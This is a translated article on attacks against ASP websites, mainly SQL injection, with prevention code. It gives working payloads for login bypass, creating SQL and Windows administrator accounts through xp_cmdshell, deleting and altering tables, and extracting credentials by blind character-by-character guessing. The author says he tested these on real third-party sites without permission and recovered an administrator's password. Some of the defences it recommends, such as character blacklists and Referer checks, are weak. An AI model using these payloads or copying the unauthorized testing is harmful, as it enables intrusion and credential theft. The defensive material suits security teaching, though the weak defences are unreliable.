SQL injection attacks and Prevention

Source: Internet
Author: User

I have never studied ASP or PHP programming systematically, nor Access, SQL Server, MySQL or any other database. So I am not a programmer, although I often do things a programmer does.
Because we needed to build our own site, it has been revised three times and thousands of lines of code have been written. Along the way, some problems were found while testing forums, message boards and article publishing systems, and we will discuss them with you now.
While writing this article, apart from setting up ASP + Access and ASP + SQL Server test environments on my local machine, I also ran some tests against the websites of the xx security site, the xx city talent network and the xx network company, for which I apologize! I chose an early-morning slot and limited the tests to search operations, so it is certain there was almost no impact on your sites. I exchanged a little traffic within one hour for a security report for you; I don't think that is too bad, heh heh!
1. Bak file leakage ASP source code
Many editors, such as EditPlus and UltraEdit, automatically save a .bak backup copy when a file is saved. For example, when you create or edit config.asp, the editor also generates config.asp.bak. If that file is not deleted, an attacker can download the ASP source by requesting http://www.***.com/config.asp.bak.
As you can imagine, once your source code has been downloaded the risk of being attacked is very high: a configuration file exposes the user name, password, database name and location ......
Solution: either disable the editor's automatic backup function, or delete all .bak files before uploading.
2. Authentication Bypass
In general, many pages of a website may be accessed only after authentication has passed. On these pages the user's identity must be verified again, but many programmers ignore this. If an attacker knows the path and file name of such a page, they can bypass authentication and open it directly. For example, a site may require you to log in through login.asp and only then reach manage.asp; an attacker can open the management interface directly via http://www.***.com/manage.asp.
Solution: confirm the identity at the beginning of each such page. For example, after authentication passes, set Session("login") = "OK", and add the following at the top of manage.asp.
The following is the program code:

If Session("login") <> "OK" Then
    Response.Redirect "login.asp"
End If

The two points above are basic programming issues. The focus of this article is discussed below: SQL injection attacks and their prevention.
3. ASP program Database Password Verification Vulnerability
First, a word about the Request object. If a form passes data with the GET method, the QueryString collection should be used to read it; with the POST method, the Form collection. For convenience, many programmers omit the collection name and simply write Request("data"). This looks simple but is in fact inefficient and error-prone: by default ASP searches the collections in the order QueryString, Form, Cookies and ServerVariables, and the first matching variable found is taken to be the member you wanted. So we recommend not using this shortcut. With that out of the way, let's get to the subject.
First, let's look at the login.asp file.
The following is the program code:

......
<form action="verify.asp" method="post" name="login">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="PWD" value="" maxlength="20">
<input type="submit" name="BT" value="OK">
<input type="reset" name="BT" value="reset">
</form>
......

Let's take a look at the verify.asp file.
The following is the program code:

......
Dim rs, SQL
Dim name, Pwd
name = Request.Form("name")
Pwd = Request.Form("PWD")

If name = "" Or Pwd = "" Then
    Response.Redirect "login.asp"
End If
......
' identity authentication
SQL = "select * from user where name='" & name & "' and Pwd='" & Pwd & "'"
......

Do not think that nobody writes code like this; I have seen many people do it. If you don't believe me, see what an attacker can do:
(1) Enter [admin' or 1='1] in the user name field and [11] in the password field (only the text inside the brackets is typed). See what the SQL becomes:
The following is the program code:

SQL = select * from user where name='admin' or 1='1' and Pwd='11'

We know that or is a logical operator: when several conditions are combined, the whole expression is true as long as one of them is true, so the password condition after and no longer decides anything. In other words, password verification has been bypassed, and we can log in as long as we know a user name.
(2) You can also enter [admin' --] in the user name field and [11] in the password field. Let's look at the SQL:
The following is the program code:

SQL = select * from user where name='admin' --' and Pwd='11'

Here the password check is commented out by the -- comment marker; this variant does not work against an Access database.
(3) If the rest of the statement can be commented out, it gets more interesting. See what we can do:
A. Enter [admin'; exec master.dbo.sp_addlogin cool; --] in the user name field to add an SQL login.
B. Enter [admin'; exec master.dbo.sp_password null, 123456, cool; --] in the user name field to set cool's password to 123456.
C. Enter [admin'; exec master.dbo.sp_addsrvrolemember cool, sysadmin; --] in the user name field to grant cool the system administrator role.
D. Enter [admin'; exec master.dbo.xp_cmdshell 'net user cool 123456 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add'; --] in the user name field to add a Windows account cool with password 123456 and set its properties; see the net user command reference for the switches.
E. Enter [admin'; exec master.dbo.xp_cmdshell 'net localgroup administrators cool /add'; --] in the user name field to add cool to the Administrators group.
I think that is terrible enough, and of course I am not finished yet. For the above to work, the site must connect to the database as sa or another system administrator account. You don't need to worry about this on ordinary shared hosting, unless the administrator is careless, but it is hard to say for websites placed on their own servers; I have seen many of them.
If the account is not sa, can nothing be done? Of course not! We just cannot get permissions high enough to control the SQL Server instance and the operating system, but we still have full management permissions on this database. Let's see what we can do:
A. Enter [admin'; delete user; --]. If the table name really is user, every record in the user table is deleted. That is drastic; never actually do this!
B. Enter [admin'; insert into user (name, PWD) values ('cool', '000000'); --] to add a user to the user table, provided the table name and field names are correct.
C. Enter [admin'; update user set Pwd='000000' where name='admin'; --] to change the admin password, again provided the table name and field names are correct.
For more that can be done, refer to the SQL syntax.
It seems that not having sa is still a letdown. Of course, there are simple ways to determine whether a website connects to the database as sa.
A. Run nc -l -p 21 in cmd to listen on port 21 of your own machine; a firewall log or similar also works.
B. Enter [admin'; exec master.dbo.xp_cmdshell 'ftp *.*.*.*']. Here *.*.*.* is your IP address. If a connection arrives, you can be sure sa is used, and you also learn the IP address of the website's database server, because some sites run the web server and SQL Server on different machines. If no connection arrives, the site uses a non-sa account.
Some of you will have noticed that if the site uses sa, a connection can be initiated from the internal server through the page, an FTP script constructed, or TFTP used to upload files, even through a firewall.
Some may say the maxlength of the form field is 20, so you cannot type that much! That doesn't matter; it can't stop us.
Method 1:
A. Open the page http://www.***.com/login.asp, view the source, and copy the form part.
The following is the program code:

<form action="verify.asp" method="post" name="login">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="PWD" value="" maxlength="20">
<input type="submit" name="BT" value="OK">
<input type="reset" name="BT" value="reset">
</form>

Save it as login.htm.
B. Change the action to http://www.***.com/verify.asp, that is:
The following is the program code:

<form action="http://www.***.com/verify.asp" method="post" name="login">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="PWD" value="" maxlength="20">
<input type="submit" name="BT" value="OK">
<input type="reset" name="BT" value="reset">
</form>

Note: on some websites the action is empty; then you need to find the page the form really submits to and point the action at it. I have run into this and can usually find it.
C. Increase maxlength, and then increase it some more, or simply delete the attribute!
D. Submit the form from the local file.
Method 2:
cool.reg
Windows 9x users:
The following is the program code:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Increase for me]
@="C:\\cool.htm"
"Contexts"=dword:00000004

Windows 2000 users:
The following is the program code:

Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt\Increase for me]
@="C:\\cool.htm"
"Contexts"=dword:00000004

cool.htm
The following is the program code:

<script language="VBScript">
Set srcEvent = external.menuArguments.event
Set doc = external.menuArguments.document
Set ele = doc.elementFromPoint(srcEvent.clientX, srcEvent.clientY)
If ele.type = "text" Or ele.type = "password" Then
    ele.maxLength = 100
    ele.size = 100
End If
</script>

A. Copy the contents of cool.reg, save the file, run it and confirm.
B. Save the contents of cool.htm to the specified location, here C:\.
C. Open the page http://www.***.com, right-click the input box and you will see "Increase for me"; click it.
Of course, you can edit cool.reg to change the cool.htm file name, or edit cool.htm to change the size and maxlength.
Enough of the scary things; now let's see how to prevent them.
(1) Filter submitted data. We can use
The following is the program code:

......
Dim name, Pwd
name = Request.Form("name")
name = Replace(name, "'", "＇")   ' replace the half-width apostrophe with a full-width one
name = Replace(name, "-", "")     ' replace - with nothing
name = Replace(name, ";", "")     ' replace ; with nothing
......

Or
The following is the program code:

......
Dim name, Pwd
name = Request.Form("name")
If InStr(name, "'") Or InStr(name, "-") Or InStr(name, ";") Then
    Response.Write "<script language=""JavaScript"">alert(""error!""); history.go(-1);</script>"
    Response.End
End If
......

The exact filtering or replacement rules must be chosen according to the actual situation.
(2) The validation logic in verify.asp is wrong and should be changed to:
The following is the program code:

......
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select * from user where name='" & name & "'"
rs.Open SQL, conn_data, 1, 1
' authentication process
If Not rs.EOF Then
    If Pwd = rs("PWD") Then
        Session("login") = "OK"
        Response.Redirect "/default.asp"
    Else
        Response.Redirect "login.asp"
    End If
Else
    Response.Redirect "login.asp"
End If
......

That is, only the user name is used as the query condition, and the password of the retrieved record is compared with the password entered by the client.
(3) There are many encryption routines for user passwords available on the Internet. If we call one of them encrypt(), verify.asp should become:
The following is the program code:

......
Set rs = Server.CreateObject("ADODB.Recordset")
SQL = "select * from user where name='" & name & "'"
rs.Open SQL, conn_data, 1, 1
' authentication process
If Not rs.EOF Then
    If encrypt(Pwd) = rs("PWD") Then   ' encrypt the entered password before comparing
        Session("login") = "OK"
        Response.Redirect "/default.asp"
    Else
        Response.Redirect "login.asp"
    End If
Else
    Response.Redirect "login.asp"
End If
......

(4) Perform query, insert, update and delete operations under different database user accounts. Keeping the operations each account may perform separate prevents a place that was only meant to run SELECT from being used to execute insert, update or delete. Do not skimp on this for a large official site!
(5) Define specific stored procedures in the database and allow only those stored procedures to be executed. All user input then has to fit the security context of the called stored procedure, which makes injection attacks much harder to launch.
(6) Restrict the input length of form fields and query strings. If a login name is at most 20 characters, do not accept more than 20 characters from the form; this greatly increases the difficulty of inserting harmful code into SQL commands. Of course, as shown above, this restriction can be bypassed by submitting locally, but there are still ways to control it. Let's see:
A. When reading data, take only the valid length.
The following is the program code:

......
Dim name, Pwd
name = Left(Request.Form("name"), 20)
......

B. Confirm the submission location on the server.
login.asp
The following is the program code:

......
<form action="verify.asp" method="post" name="login">
<input type="hidden" name="Referer" value="<%= Request.ServerVariables("HTTP_REFERER") %>">
<input type="hidden" name="ser_name" value="<%= Request.ServerVariables("SERVER_NAME") %>">
Username <input type="text" name="name" value="" maxlength="20">
Password <input type="password" name="PWD" value="" maxlength="20">
<input type="submit" name="BT" value="OK">
<input type="reset" name="BT" value="reset">
</form>
......

Two parameters, Referer and ser_name, are passed here.
verify.asp
The following is the program code:

......
Dim Referer, ser_name
' read the two values
Referer = CStr(Request.ServerVariables("HTTP_REFERER"))
ser_name = CStr(Request.ServerVariables("SERVER_NAME"))
' check where the browser came from (position 8 skips the "http://" prefix)
If Mid(Referer, 8, Len(ser_name)) <> ser_name Then
    Response.Redirect "login.asp"
End If
......

In this way, anyone who does not submit the data from this website will not be able to log in.
(7) Check the number of records returned by the query. If the program expects exactly one record but more than one row comes back, treat it as an error.
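As an added example (not code from the original article), here is how the login check in verify.asp can be written so that the user name never becomes part of the SQL text, combining points (2), (3) and (7): an ADODB.Command with a bound parameter replaces string concatenation, the stored password is compared against a hash of the submitted one, and the login is rejected unless exactly one row matches. conn_data is the connection string the article uses elsewhere; HashPassword() is assumed to exist and stands in for the article's unspecified encrypt() routine.

```vbscript
<%
' Added example (not the article's code): verify.asp with a bound parameter,
' a hashed password comparison and a single-row check.
' Assumed: conn_data is the page's connection string; HashPassword() is the
' site's one-way hash, standing in for the article's unspecified encrypt().
Const adVarChar = 200, adParamInput = 1, adCmdText = 1

Function LoginUser(name, pwd)
    Dim conn, cmd, rs, matches, hashed
    LoginUser = False
    ' Reject empty or over-long input before touching the database (point 6)
    If Len(name) = 0 Or Len(name) > 20 Or Len(pwd) = 0 Then Exit Function

    Set conn = Server.CreateObject("ADODB.Connection")
    conn.Open conn_data
    Set cmd = Server.CreateObject("ADODB.Command")
    Set cmd.ActiveConnection = conn
    cmd.CommandType = adCmdText
    ' The ? placeholder is sent as data, so ', -- and ; inside name are never parsed as SQL
    cmd.CommandText = "SELECT Pwd FROM [user] WHERE name = ?"
    cmd.Parameters.Append cmd.CreateParameter("name", adVarChar, adParamInput, 20, name)
    Set rs = cmd.Execute

    ' Hash once, then compare against every row the query returned (point 3)
    hashed = HashPassword(pwd)
    matches = 0
    Do While Not rs.EOF
        If hashed = (rs("Pwd") & "") Then matches = matches + 1
        rs.MoveNext
    Loop
    rs.Close
    conn.Close
    ' Exactly one matching record is a login; zero or several is treated as an error (point 7)
    LoginUser = (matches = 1)
End Function

' Read from the Form collection explicitly, never from the bare Request object
If LoginUser(Request.Form("name") & "", Request.Form("PWD") & "") Then
    Session("login") = "OK"
    Response.Redirect "/default.asp"
Else
    Response.Redirect "login.asp"
End If
%>
```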
4. Web page parameters are not filtered
Many websites have this problem, for example http://www.***.com/show.asp?Id=50. When Id is neither filtered nor validated, the whole site is in a very dangerous position.
We can test whether the problem exists with a simple method:
http://www.***.com/show.asp?Id=50 and 1=1
If the page displays correctly, the problem exists.
Let's see what an attacker can write:
(1) http://www.***.com/show.asp?Id=50; exec master.dbo.sp_addlogin cool; --
(2) http://www.***.com/show.asp?Id=50; exec master.dbo.sp_password null, 123456, cool; --
(3) http://www.***.com/show.asp?Id=50; exec master.dbo.sp_addsrvrolemember cool, sysadmin; --
(4) http://www.***.com/show.asp?Id=50; exec master.dbo.xp_cmdshell 'net user cool 123456 /add'; --
(5) http://www.***.com/show.asp?Id=50; exec master.dbo.xp_cmdshell 'net localgroup administrators cool /add'; --
Whatever can be submitted through a form can be submitted here too.
(6) Guess the table name:
http://www.***.com/show.asp?Id=50 and 0<>(select count(*) from tablename)
Here tablename is the table name you are guessing. If the page displays normally, the guess is correct.
(7) Guess the field name:
http://www.***.com/show.asp?Id=50 and 0<>(select count(fieldname) from tablename)
Here fieldname is the name of a field in the table. If the page displays normally, the field name is correct.
(8) Once tablename and fieldname are known, you can go further.
For example, to log on to the system: suppose tablename is user and the fields are ID, name and PWD. See what can be done:
A. http://www.***.com/show.asp?Id=50 and 0<>(select count(*) from user where ID>1000)
Roughly determines the number of users.
B. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and len(name)=10)
Tests whether the user name with ID 1 is 10 characters long.
C. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and mid(name, N, 1)='a')
Tests whether the Nth character of the user name with ID 1 is a.
D. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and len(PWD)=10)
Tests whether the password of the user with ID 1 is 10 characters long.
E. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and mid(PWD, N, 1)='a')
Tests whether the Nth character of that user's password is a. If the passwords are not encrypted, well!
Of course, mid(PWD, N, 1) can also be written as right(left(PWD, N), 1); a matter of personal habit.
But isn't trying it by hand like this too tiring? Write a little script in Perl and use a dictionary? That is up to you!
There is also a small trick that lets you crack the user name and password quickly. Using this method, in 10 minutes I finished guessing the table name, the column names, a 10-character user name (five Chinese characters in total) and a 12-character password (one Chinese character), and got the user name and password of the back-end administrator of the XX security website, though 8 of the characters were guessed by social engineering. It is just a bit depressing that I never found the login interface for the website's back end ......
A. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and len(name)=10)
Determine the user name length first.
B. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and len(PWD)=10)
Confirm the password length.
C. http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and asc(mid(name, 1, 1))<0)
Determine whether the first character of the user name is Chinese; for a Chinese character the value is generally negative.
If it is not, the value generally lies between 27 and 126, and you can use
http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and asc(mid(name, N, 1))>60)
http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and asc(mid(name, N, 1))<100)
to narrow the range and finally obtain the ASC code value. Looking it up in a standard ASCII table gives the Nth character.
If it is Chinese, the value is negative (no lower than -32,768). You can use
http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and asc(mid(name, N, 1))>-30000)
http://www.***.com/show.asp?Id=50 and 1=(select count(*) from user where id=1 and asc(mid(name, N, 1))<-10000)
to narrow the range and finally obtain the ASC code value. The Nth character is then obtained by conversion; many editors have this function, and the Chr() function can also be used.
D. In the same way, the password content can be obtained quickly.
Now do you see the problem with omitting the collection name on the Request object, mentioned earlier?! :)
Solution: this type of problem mainly comes down to filtering transmitted parameters and verifying data validity.
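As an added example (not code from the original article), show.asp can reject anything that is not a plain integer before it reaches the database and bind the value as a typed parameter, so the "and 1=1", "; exec ..." and asc(mid(...)) probes above are all answered with a 400 instead of a query. It reads the parameter from the QueryString collection explicitly rather than the bare Request object; conn_data and a table named News are assumptions.

```vbscript
<%
' Added example (not the article's code): show.asp that validates Id before
' it reaches SQL and binds it as an integer parameter.
' Assumed: conn_data is the page's connection string; the table is named News.
Const adInteger = 3, adParamInput = 1, adCmdText = 1

' Returns the Id as a Long, or -1 when the parameter is not a plain positive
' integer. "50 and 1=1", "50; exec ..." and "50 and 1=(select ..." all fail here.
Function SafeId(raw)
    Dim re
    Set re = New RegExp
    re.Pattern = "^[1-9][0-9]{0,8}$"
    SafeId = -1
    If re.Test(raw) Then SafeId = CLng(raw)
End Function

Dim id, conn, cmd, rs
' Read the QueryString collection explicitly, not the bare Request object
id = SafeId(Request.QueryString("Id") & "")
If id < 0 Then
    ' Rejected values remain visible in the IIS log's cs-uri-query field for review
    Response.Status = "400 Bad Request"
    Response.End
End If

Set conn = Server.CreateObject("ADODB.Connection")
conn.Open conn_data
Set cmd = Server.CreateObject("ADODB.Command")
Set cmd.ActiveConnection = conn
cmd.CommandType = adCmdText
' The value is bound as a number; no string is ever spliced into the SQL text
cmd.CommandText = "SELECT title, body FROM News WHERE id = ?"
cmd.Parameters.Append cmd.CreateParameter("id", adInteger, adParamInput, 4, id)
Set rs = cmd.Execute
If rs.EOF Then
    Response.Status = "404 Not Found"
Else
    ' Encode on output so stored content cannot inject script into the page
    Response.Write "<h1>" & Server.HTMLEncode(rs("title") & "") & "</h1>"
    Response.Write "<div>" & Server.HTMLEncode(rs("body") & "") & "</div>"
End If
rs.Close
conn.Close
%>
```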
Limited by my personal level, the above is not necessarily entirely correct and many areas are not covered; I hope to exchange ideas with you more.
